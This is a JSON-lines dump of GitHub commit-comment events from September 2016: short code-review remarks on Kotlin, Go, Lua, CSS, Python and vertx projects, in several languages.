{"id":"4533571154","type":"CommitCommentEvent","actor":{"login":"ggmich"},"repo":{"name":"ggmich/BesutKode.github.io"},"payload":{"comment":{"id":18943736,"position":null,"line":null,"path":null,"commit_id":"6d22c2f7478f0068470ce17c83e063b820707d14","created_at":"2016-09-08T12:06:57Z","updated_at":"2016-09-08T12:06:57Z","body":"@jayvdb hi jayvdb, \r\ni just set up the country to indonesia, sorry about that mistake."}},"created_at":"2016-09-08T12:06:57Z"}
{"id":"4533580235","type":"CommitCommentEvent","actor":{"login":"thomasjo"},"repo":{"name":"thomasjo/atom-latex"},"payload":{"comment":{"id":18943754,"position":null,"line":null,"path":null,"commit_id":"dfe7e46a6a2619ff25cd7451e2dec86395491d2b","created_at":"2016-09-08T12:08:57Z","updated_at":"2016-09-08T12:08:57Z","body":"@yitzchak This commit removed intentional double spaces that get turned into newlines. By default the `language-gfm` package prevents these from being removed, so I guess these were either intentionally removed, or you're not using the aforementioned package?"}},"created_at":"2016-09-08T12:08:57Z"}
{"id":"4533584166","type":"CommitCommentEvent","actor":{"login":"Jeybla"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18943758,"position":null,"line":null,"path":null,"commit_id":"d074cf67a78e43e159a83a4b60c8a5d2f34da989","created_at":"2016-09-08T12:09:50Z","updated_at":"2016-09-08T12:09:50Z","body":"Yay 14k hype! Gratz!"}},"created_at":"2016-09-08T12:09:50Z"}
{"id":"4533588969","type":"CommitCommentEvent","actor":{"login":"daniel-cyberbotics"},"repo":{"name":"omichel/webots-doc"},"payload":{"comment":{"id":18943765,"position":4,"line":53,"path":"README.md","commit_id":"5d6614b7817e10749d7b2225257e0c4e5d7ddb82","created_at":"2016-09-08T12:10:52Z","updated_at":"2016-09-08T12:10:52Z","body":"I modified this file thinking it was a Wiki-like page ! Olivier told me there is no PR for Wiki. But actually you are right for Readme.md.\r\nWhat I have to do to fix this mistake ?"}},"created_at":"2016-09-08T12:10:52Z"}
{"id":"4533592400","type":"CommitCommentEvent","actor":{"login":"PatrickRorth"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18943771,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-08T12:11:35Z","updated_at":"2016-09-08T12:11:35Z","body":"You should be able to get the links though javascript with some Regex, have you tried that? Or maybe i just dont understand the question :)"}},"created_at":"2016-09-08T12:11:35Z"}
{"id":"4533593518","type":"CommitCommentEvent","actor":{"login":"jackhai"},"repo":{"name":"jackhai/hai.github.io"},"payload":{"comment":{"id":18943775,"position":null,"line":null,"path":null,"commit_id":"dcb1b7b06a77c4f5035cd1594ac05b0db0fa3e08","created_at":"2016-09-08T12:11:49Z","updated_at":"2016-09-08T12:11:49Z","body":"进一步学习阶段"}},"created_at":"2016-09-08T12:11:49Z"}
{"id":"4533598463","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18943784,"position":34,"line":144,"path":"integration/groot/create_remote_test.go","commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T12:12:56Z","updated_at":"2016-09-08T12:12:56Z","body":"oops"}},"created_at":"2016-09-08T12:12:56Z"}
{"id":"4533598753","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18943785,"position":null,"line":null,"path":null,"commit_id":"03833f38f29a81b9906dc55b77b6ab4c56196a54","created_at":"2016-09-08T12:13:00Z","updated_at":"2016-09-08T12:13:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#DGNq004BQpSvgDSJjBoKiA"}},"created_at":"2016-09-08T12:13:00Z"}
{"id":"4533600045","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18943787,"position":39,"line":0,"path":"tutorials/01_requests_click.md","commit_id":"3e05f9308097228226b6d25e6e319dc8af2e1e98","created_at":"2016-09-08T12:13:17Z","updated_at":"2016-09-08T12:13:17Z","body":"Nechceš snad studentům dávat své heslo? ;) Lepší by bylo předávat username jako argument skriptu."}},"created_at":"2016-09-08T12:13:17Z"}
{"id":"4533601589","type":"CommitCommentEvent","actor":{"login":"lhoss"},"repo":{"name":"teralytics/ansible-postgresql"},"payload":{"comment":{"id":18943788,"position":23,"line":12,"path":"tasks/databases.yml","commit_id":"df1e2f5051785b0f24b0986665de9b84fd21ac5e","created_at":"2016-09-08T12:13:35Z","updated_at":"2016-09-08T12:13:35Z","body":"remove the PGPASSWORD"}},"created_at":"2016-09-08T12:13:35Z"}
{"id":"4533605936","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18943798,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T12:14:33Z","updated_at":"2016-09-08T12:14:33Z","body":"Thank you very much @cescoffier !\r\nJust two more tiny question please. Let's say I'm using Guava cache, which basically reads from an in-JVM map, can a cache.get(key) from that map really be considered as blocking? Maybe it would just create overhead to wrap the cache.get(key) call in executeBlocking, or am I thinking wrongly here? \r\nAlso, I can make sure that I only use a specific cache instance from one verticle instance. That way, I would never risk using it from the wrong Context, right? "}},"created_at":"2016-09-08T12:14:33Z"}
{"id":"4533608497","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18943806,"position":13,"line":46,"path":"store/cache_driver/cache_driver.go","commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T12:15:09Z","updated_at":"2016-09-08T12:15:09Z","body":"Blob is a file, what is the advantage of using `RemoveAll` here?"}},"created_at":"2016-09-08T12:15:09Z"}
{"id":"4533610595","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18943808,"position":39,"line":0,"path":"tutorials/01_requests_click.md","commit_id":"3e05f9308097228226b6d25e6e319dc8af2e1e98","created_at":"2016-09-08T12:15:34Z","updated_at":"2016-09-08T12:15:34Z","body":"A dávám? Je to příklad, řeknu jim, ať si tam dají sebe."}},"created_at":"2016-09-08T12:15:34Z"}
{"id":"4533611880","type":"CommitCommentEvent","actor":{"login":"PhilipMantrov"},"repo":{"name":"cass-project/cass"},"payload":{"comment":{"id":18943813,"position":null,"line":null,"path":null,"commit_id":"e94115d75bc47a0d7f010f78162c3d59a3d60423","created_at":"2016-09-08T12:15:52Z","updated_at":"2016-09-08T12:15:52Z","body":"Don't do 'npm install' until branch 'Angular2.0.0-rc.6' merged into master."}},"created_at":"2016-09-08T12:15:52Z"}
{"id":"4533612101","type":"CommitCommentEvent","actor":{"login":"hakanw"},"repo":{"name":"stephenmcd/django-postgres-fuzzycount"},"payload":{"comment":{"id":18943814,"position":null,"line":null,"path":null,"commit_id":"39e7c1d2ce55bf93bb49dba3097107dc17a9d3b2","created_at":"2016-09-08T12:15:55Z","updated_at":"2016-09-08T12:15:55Z","body":"Was this down-grade of the version number intentional? It means that if you install from the github repository, it thinks this is the same version as another older one on PyPi."}},"created_at":"2016-09-08T12:15:55Z"}
{"id":"4533617975","type":"CommitCommentEvent","actor":{"login":"azeier"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":18943830,"position":69,"line":68,"path":"hsreplaynet/static/scripts/src/components/MyReplays.tsx","commit_id":"c05229a2b9772b899c16232869a3b7d33ea25cdd","created_at":"2016-09-08T12:17:15Z","updated_at":"2016-09-08T12:17:15Z","body":"Guess these `get`s should be moved outside the loop"}},"created_at":"2016-09-08T12:17:15Z"}
{"id":"4533624394","type":"CommitCommentEvent","actor":{"login":"fabienrohrer"},"repo":{"name":"omichel/webots-doc"},"payload":{"comment":{"id":18943843,"position":4,"line":53,"path":"README.md","commit_id":"5d6614b7817e10749d7b2225257e0c4e5d7ddb82","created_at":"2016-09-08T12:18:38Z","updated_at":"2016-09-08T12:18:38Z","body":"I would propose to keep pit like this, and next time to create a PR :-)"}},"created_at":"2016-09-08T12:18:38Z"}
{"id":"4533624469","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18943845,"position":null,"line":null,"path":null,"commit_id":"03833f38f29a81b9906dc55b77b6ab4c56196a54","created_at":"2016-09-08T12:18:39Z","updated_at":"2016-09-08T12:18:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VC0EoJdkRoGTBOEFf_mWzA"}},"created_at":"2016-09-08T12:18:39Z"}
{"id":"4533626476","type":"CommitCommentEvent","actor":{"login":"jbrunelle"},"repo":{"name":"jbrunelle/ODUCS418F16"},"payload":{"comment":{"id":18943849,"position":null,"line":null,"path":null,"commit_id":"b8dcf16f606daae255291eca36e898a3a591e312","created_at":"2016-09-08T12:19:06Z","updated_at":"2016-09-08T12:19:06Z","body":"monica: this repo is public. Please follow the assignment instructions: this file should be named after your CS user name (it is not) and the repo you list should be private (it is not)."}},"created_at":"2016-09-08T12:19:06Z"}
{"id":"4533627234","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18943854,"position":null,"line":null,"path":null,"commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T12:19:16Z","updated_at":"2016-09-08T12:19:16Z","body":"This commit does the trick with the blobs. If streaming the blob fails we clean up the corrupted cache. However, given that we stream and unpack at the same time, it looks to me that we can end up with a corrupted volume. The integration test just checks for the blob. Maybe checking for the volume as well would help in this situation..."}},"created_at":"2016-09-08T12:19:16Z"}
{"id":"4533632230","type":"CommitCommentEvent","actor":{"login":"azeier"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":18943865,"position":null,"line":null,"path":null,"commit_id":"e224e0f8418276f681655ba2567e9904c3152574","created_at":"2016-09-08T12:20:20Z","updated_at":"2016-09-08T12:20:20Z","body":"`Reset search` does not clear the UI right now"}},"created_at":"2016-09-08T12:20:20Z"}
{"id":"4533632595","type":"CommitCommentEvent","actor":{"login":"rprouse"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18943866,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T12:20:24Z","updated_at":"2016-09-08T12:20:24Z","body":"I thought the same thing, but I consider our use of Func in 2.0 to be a compatibility shim that users shouldn't be using. I think our interface should only use features of the language it targets. I could be wrong though :smile:"}},"created_at":"2016-09-08T12:20:24Z"}
{"id":"4533635090","type":"CommitCommentEvent","actor":{"login":"azeier"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":18943876,"position":null,"line":null,"path":null,"commit_id":"c05229a2b9772b899c16232869a3b7d33ea25cdd","created_at":"2016-09-08T12:20:56Z","updated_at":"2016-09-08T12:20:56Z","body":"Reset search does not clear the UI right now"}},"created_at":"2016-09-08T12:20:56Z"}
{"id":"4533641691","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18943898,"position":24,"line":71,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"f6c9fcfdaae9c515dce4fb0437b56c23ccf56e0f","created_at":"2016-09-08T12:22:18Z","updated_at":"2016-09-08T12:22:18Z","body":"The problem is that `typeAliasProtos` is lazy\r\nBut as `.keys` call requires no significant computations, I'll replace laziness with custom getter if you don't mind"}},"created_at":"2016-09-08T12:22:18Z"}
{"id":"4533644253","type":"CommitCommentEvent","actor":{"login":"sanmai-NL"},"repo":{"name":"LanguageMachines/ucto"},"payload":{"comment":{"id":18943907,"position":null,"line":null,"path":null,"commit_id":"77188bd824c1240258ed42822c64e70ecacd3244","created_at":"2016-09-08T12:22:52Z","updated_at":"2016-09-08T12:22:52Z","body":"Suggestion, you could debug these pesky Travis CI issues in your own fork of the repo. That will cause less commit noise."}},"created_at":"2016-09-08T12:22:52Z"}
{"id":"4533651897","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18943913,"position":5,"line":124,"path":"integration/groot/create_remote_test.go","commit_id":"5df1c0f9586010f698c59c0e6112333d0785baa7","created_at":"2016-09-08T12:24:20Z","updated_at":"2016-09-08T12:24:20Z","body":"This is probably a very slow integration test. Can we create a simple, small image with Docker 1.9 or earlier instead? Feel free to make/prioritise a chore for that since it's now delivered."}},"created_at":"2016-09-08T12:24:20Z"}
{"id":"4533652548","type":"CommitCommentEvent","actor":{"login":"KNU-IoT"},"repo":{"name":"PJKwang/IoT-KNU-20162-Team13"},"payload":{"comment":{"id":18943914,"position":null,"line":null,"path":null,"commit_id":"65455511debaf0480d1dd59cf5dff2387688325c","created_at":"2016-09-08T12:24:28Z","updated_at":"2016-09-08T12:24:28Z","body":"l"}},"created_at":"2016-09-08T12:24:28Z"}
{"id":"4533654372","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"ggmich/BesutKode.github.io"},"payload":{"comment":{"id":18943916,"position":null,"line":null,"path":null,"commit_id":"6d22c2f7478f0068470ce17c83e063b820707d14","created_at":"2016-09-08T12:24:51Z","updated_at":"2016-09-08T12:24:51Z","body":"No worries."}},"created_at":"2016-09-08T12:24:51Z"}
{"id":"4533655237","type":"CommitCommentEvent","actor":{"login":"alexkopiika"},"repo":{"name":"fygol/spring-mvc-starter"},"payload":{"comment":{"id":18943918,"position":23,"line":34,"path":"spring-mvc-java/src/main/java/io/starter/springmvc/controller/UserController.java","commit_id":"7a2610348b81eb0455e2d88e07bc5974cd45b613","created_at":"2016-09-08T12:25:01Z","updated_at":"2016-09-08T12:25:01Z","body":"Add validation"}},"created_at":"2016-09-08T12:25:01Z"}
{"id":"4533655379","type":"CommitCommentEvent","actor":{"login":"thomasjo"},"repo":{"name":"thomasjo/atom-latex"},"payload":{"comment":{"id":18943919,"position":11,"line":13,"path":"CHANGELOG.md","commit_id":"dfe7e46a6a2619ff25cd7451e2dec86395491d2b","created_at":"2016-09-08T12:25:02Z","updated_at":"2016-09-08T12:25:02Z","body":"It'd be great if you could remove this.\r\nMainly because this is non-user facing change, but I also don't want to attribute my PRs 🙇 "}},"created_at":"2016-09-08T12:25:02Z"}
{"id":"4533658926","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"gorhill/uBO-WebSocket"},"payload":{"comment":{"id":18943932,"position":97,"line":97,"path":"contentscript.js","commit_id":"a4c85f0ae004e332e932b6d6452e3fa75fc6f7f8","created_at":"2016-09-08T12:25:46Z","updated_at":"2016-09-08T12:25:46Z","body":"Why the text string?\r\n\r\n```js\r\nscript.textContent = '(' + function() {\r\n  // normally parsed and highlighted js code here\r\n} + ')();`;\r\n```"}},"created_at":"2016-09-08T12:25:46Z"}
{"id":"4533662344","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18943938,"position":39,"line":0,"path":"tutorials/01_requests_click.md","commit_id":"3e05f9308097228226b6d25e6e319dc8af2e1e98","created_at":"2016-09-08T12:26:31Z","updated_at":"2016-09-08T12:26:31Z","body":"Co takhle?\r\n\r\n```python\r\n>>> username = input('Username: ')\r\n```"}},"created_at":"2016-09-08T12:26:31Z"}
{"id":"4533662992","type":"CommitCommentEvent","actor":{"login":"andela-amwaleh"},"repo":{"name":"andela-lolo/office-space-allocation"},"payload":{"comment":{"id":18943940,"position":30,"line":31,"path":"app/person/personClass.py","commit_id":"824af6898b9ce8c39a69be2ef57d9446bce2bfc4","created_at":"2016-09-08T12:26:38Z","updated_at":"2016-09-08T12:26:38Z","body":"Hi try this method of iterating through a dictionary\r\n```\r\nd = {'a': 1, 'b': 2}\r\nfor key ,value  in d.items():\r\n\tprint(key,value)\r\n```\r\n"}},"created_at":"2016-09-08T12:26:38Z"}
{"id":"4533664570","type":"CommitCommentEvent","actor":{"login":"iDhruv22"},"repo":{"name":"iDhruv22/angular"},"payload":{"comment":{"id":18943946,"position":null,"line":null,"path":null,"commit_id":"f7514b066557d731c854c15bed8b716de7f6c596","created_at":"2016-09-08T12:26:56Z","updated_at":"2016-09-08T12:26:56Z","body":"Created a dummy DOM to parse a template string."}},"created_at":"2016-09-08T12:26:56Z"}
{"id":"4533664921","type":"CommitCommentEvent","actor":{"login":"Vlandmist"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18943949,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-08T12:27:00Z","updated_at":"2016-09-08T12:27:00Z","body":"I'll explain myself: since webos tv supports HLS stream my html page result needs to contain something like this:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/6247124/18348910/7d816f92-75ce-11e6-89b0-0f04e945f73e.png)\r\n\r\nNow, the problem is that in order to obtain this playable HLS link I need to get the result of an http GET request which is something like this:\r\n![image](https://cloud.githubusercontent.com/assets/6247124/18349027/27629478-75cf-11e6-81be-d25e088d400c.png)\r\n\r\n\r\nI tried to do that directly from my html page using jQuery AJAX but it gives me a `**Access-Control-Allow-Origin**` error because of the different domain.\r\n\r\nmy only working solution until now has been using a php script (that executes the http request), host it on my website and using ajax to reqest the data (as jsonp).\r\n\r\ni'd prefer a solution contained in the webos app, in order to avoid a dependency from the php script. \r\n\r\n\r\nhave you thought about doing something similar and avoid using the twitch embedded player?\r\n\r\n"}},"created_at":"2016-09-08T12:27:00Z"}
{"id":"4533668642","type":"CommitCommentEvent","actor":{"login":"zzawadz"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18943961,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T12:27:45Z","updated_at":"2016-09-08T12:27:45Z","body":"They probably don't need to run our tests (in which we use rJava). Everything else is fine.\r\n\r\nDo you know anyone who uses 32bit system? Heeey! It's 2016, 2006 is gone! "}},"created_at":"2016-09-08T12:27:45Z"}
{"id":"4533668851","type":"CommitCommentEvent","actor":{"login":"romanivanov21"},"repo":{"name":"romanivanov21/web_server"},"payload":{"comment":{"id":18943963,"position":4,"line":12,"path":"inc/common/types.h","commit_id":"3735fc1bee1188b1bbf4087e02055fcc119c3be1","created_at":"2016-09-08T12:27:48Z","updated_at":"2016-09-08T12:27:48Z","body":"Этому девайну нет места в types.h, потому что буффер для которого ты его объявил он не глобальный и за дефайн пределами функции не используется. Почему именно 80 не понятно. И можно ли обойтись без char буффера?"}},"created_at":"2016-09-08T12:27:48Z"}
{"id":"4533671416","type":"CommitCommentEvent","actor":{"login":"konjo99"},"repo":{"name":"martymcguire/inkscape-unicorn"},"payload":{"comment":{"id":18943968,"position":23,"line":23,"path":"src/unicorn.py","commit_id":"3e0e0cb8d28e927be55b5499fa390818c78dc223","created_at":"2016-09-08T12:28:20Z","updated_at":"2016-09-08T12:28:20Z","body":"Traceback (most recent call last):\r\n\r\n  File \"unicorn.py\", line 23, in <module>\r\n\r\n    from unicorn.context import GCodeContext\r\n\r\n  File \"C:\\Program Files (x86)\\Inkscape\\share\\extensions\\unicorn.py\", line 23, in <module>\r\n\r\n    from unicorn.context import GCodeContext\r\n\r\nImportError: No module named context\r\n\r\n"}},"created_at":"2016-09-08T12:28:20Z"}
{"id":"4533677379","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18943979,"position":39,"line":0,"path":"tutorials/01_requests_click.md","commit_id":"3e05f9308097228226b6d25e6e319dc8af2e1e98","created_at":"2016-09-08T12:29:34Z","updated_at":"2016-09-08T12:29:34Z","body":"done"}},"created_at":"2016-09-08T12:29:34Z"}
{"id":"4533677414","type":"CommitCommentEvent","actor":{"login":"pedro-andrade-inpe"},"repo":{"name":"TerraME/terrame"},"payload":{"comment":{"id":18943980,"position":22,"line":482,"path":"packages/base/lua/File.lua","commit_id":"65ce0fb5ac982ab18cc8a4046a34c45d8e08ce9b","created_at":"2016-09-08T12:29:35Z","updated_at":"2016-09-08T12:29:35Z","body":"You should not show this in the example. It should be `tostring(file)`"}},"created_at":"2016-09-08T12:29:35Z"}
{"id":"4533679658","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18943988,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-08T12:30:05Z","updated_at":"2016-09-08T12:30:05Z","body":"Okay the next version will have a restart variable counter which also increments on initial game start from 0 to 1 so that we can:\r\n\r\n- Start timer on initial game start\r\n- Reset timer without pressing first button\r\n- Ignoring restart loading time to make it even for people with weaker PC"}},"created_at":"2016-09-08T12:30:05Z"}
{"id":"4533680657","type":"CommitCommentEvent","actor":{"login":"williamnolan"},"repo":{"name":"axuno/MailMergeLib"},"payload":{"comment":{"id":18943990,"position":null,"line":null,"path":null,"commit_id":"418c305a1f519c8b298176d882224bfbb209e754","created_at":"2016-09-08T12:30:18Z","updated_at":"2016-09-08T12:30:18Z","body":"Hmm.  After investigating this further, it seems that NuGet doesn't facilitate the loading of packages to  project-specific locations; they are always loaded to the SLN directory.  Yes, according to the latest docs you can \"specify\" where the packages go, but it is still on a _per-solution_ basis.  (E.g., if you open a large solution containing several projects, when you \"NuGet\" the latest packages, they will all be placed in the SAME directory - instead of each project placing them in their local directories.)"}},"created_at":"2016-09-08T12:30:18Z"}
{"id":"4533681451","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18943992,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-08T12:30:27Z","updated_at":"2016-09-08T12:30:27Z","body":"I have thought about that as well but unless we have a clear and unambiguous understanding of the requirements from the CoAP spec, I would rather stick with the obvious case of IP address and port.\r\n\r\nHowever, it might make sense to introduce the concept of the endpoint address as it is used in the CoAP spec. Ironically though, the ambiguity and lack of specificity of it is what actually causes most of our problems with correlation ... "}},"created_at":"2016-09-08T12:30:27Z"}
{"id":"4533682136","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":18943994,"position":7,"line":137,"path":"src/nodelet/lk_flow_nodelet.cpp","commit_id":"3ab28cf0bc07d4ce53537650bfd9cb59ab3be07f","created_at":"2016-09-08T12:30:34Z","updated_at":"2016-09-08T12:30:34Z","body":"It works fine on my machine publishing 'rgb8' do you know any camera/bagfile publishing 'bgr8'?"}},"created_at":"2016-09-08T12:30:34Z"}
{"id":"4533684014","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":18944000,"position":11,"line":128,"path":"css/style.css","commit_id":"a06e023ea15beaa1b19e45861bed5e8f9dc18df9","created_at":"2016-09-08T12:30:54Z","updated_at":"2016-09-08T12:30:54Z","body":"You shouldn't write div.class - it is not correct using BEM methodology.  Read please https://ru.bem.info/methodology/quick-start/"}},"created_at":"2016-09-08T12:30:54Z"}
{"id":"4533684770","type":"CommitCommentEvent","actor":{"login":"romanivanov21"},"repo":{"name":"romanivanov21/web_server"},"payload":{"comment":{"id":18944002,"position":58,"line":62,"path":"inc/logs/server_log.h","commit_id":"3735fc1bee1188b1bbf4087e02055fcc119c3be1","created_at":"2016-09-08T12:31:03Z","updated_at":"2016-09-08T12:31:03Z","body":"Коментарии для полей класс используй в формате\r\nstd::string log_; // log\r\nили если комментарй большой, то\r\n/* log...*/\r\nstd::string log_;"}},"created_at":"2016-09-08T12:31:03Z"}
{"id":"4533685970","type":"CommitCommentEvent","actor":{"login":"pedro-andrade-inpe"},"repo":{"name":"TerraME/terrame"},"payload":{"comment":{"id":18944005,"position":26,"line":265,"path":"packages/base/tests/functional/basics/File.lua","commit_id":"65ce0fb5ac982ab18cc8a4046a34c45d8e08ce9b","created_at":"2016-09-08T12:31:18Z","updated_at":"2016-09-08T12:31:18Z","body":"There are two consecutive spaces here. Remove one."}},"created_at":"2016-09-08T12:31:18Z"}
{"id":"4533686330","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"dirkschumacher/ompr"},"payload":{"comment":{"id":18944008,"position":null,"line":null,"path":null,"commit_id":"ebf326261ecc6308f8a593fdaf368ec1b7dbd616","created_at":"2016-09-08T12:31:22Z","updated_at":"2016-09-08T12:31:22Z","body":"[R/class-model.R:307:1:](https://github.com/dirkschumacher/ompr/blob/ebf326261ecc6308f8a593fdaf368ec1b7dbd616/R/class-model.R#L307) *style:* **lines should not be more than 80 characters.**\n```r\n​                \"Take a look at one of the vignettes on how to call solve_model.\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T12:31:22Z"}
{"id":"4533688477","type":"CommitCommentEvent","actor":{"login":"coox"},"repo":{"name":"tchapi/pianette"},"payload":{"comment":{"id":18944014,"position":null,"line":null,"path":null,"commit_id":"ae87fa6152d07f33e56044c4467ed8e9fafd2af6","created_at":"2016-09-08T12:31:49Z","updated_at":"2016-09-08T12:31:49Z","body":"Toi même tu sais ❤"}},"created_at":"2016-09-08T12:31:49Z"}
{"id":"4533689188","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18944019,"position":null,"line":null,"path":null,"commit_id":"a046646f5b6cd9e8409fcaf2bf20592da483b546","created_at":"2016-09-08T12:31:58Z","updated_at":"2016-09-08T12:31:58Z","body":"Spaghetti le craponi "}},"created_at":"2016-09-08T12:31:58Z"}
{"id":"4533691927","type":"CommitCommentEvent","actor":{"login":"romanivanov21"},"repo":{"name":"romanivanov21/web_server"},"payload":{"comment":{"id":18944026,"position":58,"line":62,"path":"inc/logs/server_log.h","commit_id":"3735fc1bee1188b1bbf4087e02055fcc119c3be1","created_at":"2016-09-08T12:32:31Z","updated_at":"2016-09-08T12:32:31Z","body":"mutable std::mutex mut_; это же поле класса."}},"created_at":"2016-09-08T12:32:31Z"}
{"id":"4533691996","type":"CommitCommentEvent","actor":{"login":"pedro-andrade-inpe"},"repo":{"name":"TerraME/terrame"},"payload":{"comment":{"id":18944028,"position":7,"line":147,"path":"packages/base/lua/Directory.lua","commit_id":"65ce0fb5ac982ab18cc8a4046a34c45d8e08ce9b","created_at":"2016-09-08T12:32:32Z","updated_at":"2016-09-08T12:32:32Z","body":"Use `tostring(dir) here instead. If it fails in the tests, probably you cannot declare it here, you must only implement it within the metatable directly."}},"created_at":"2016-09-08T12:32:32Z"}
{"id":"4533692561","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":18944029,"position":39,"line":156,"path":"css/style.css","commit_id":"a06e023ea15beaa1b19e45861bed5e8f9dc18df9","created_at":"2016-09-08T12:32:39Z","updated_at":"2016-09-08T12:32:39Z","body":"remove please tag in all style (thead, td, select....) We use only class name"}},"created_at":"2016-09-08T12:32:39Z"}
{"id":"4533692992","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18944033,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T12:32:45Z","updated_at":"2016-09-08T12:32:45Z","body":"It's a very interesting question. It depends the degree of blocking you want to allow. It's blocking as it has synchronized blocks and these blocks are going to be executed by different thread. So, you may block waiting for the monitor lock to be released. However, this is generally acceptable. I would actually say it's acceptable.\r\n\r\nSo avoid this and be asynchronous you can always execute the `get` operation from the same context / thread. So biased locking make it non-blocking. If, as you proposed, the cache is only access by the same verticle, it would work the same way (same thread).\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-08T12:32:45Z"}
{"id":"4533695066","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18944037,"position":24,"line":71,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"f6c9fcfdaae9c515dce4fb0437b56c23ccf56e0f","created_at":"2016-09-08T12:33:12Z","updated_at":"2016-09-08T12:33:12Z","body":"Yes, I've meant `get() = typeAliasProtos.keys` or even inlining that"}},"created_at":"2016-09-08T12:33:12Z"}
{"id":"4533695737","type":"CommitCommentEvent","actor":{"login":"djimelec"},"repo":{"name":"djimelec/EBC-Bilateral-Brain-Stimulator"},"payload":{"comment":{"id":18944040,"position":null,"line":null,"path":null,"commit_id":"6131b06c419a67c3963da186814891cdcce85b66","created_at":"2016-09-08T12:33:19Z","updated_at":"2016-09-08T12:33:19Z","body":"Added references"}},"created_at":"2016-09-08T12:33:19Z"}
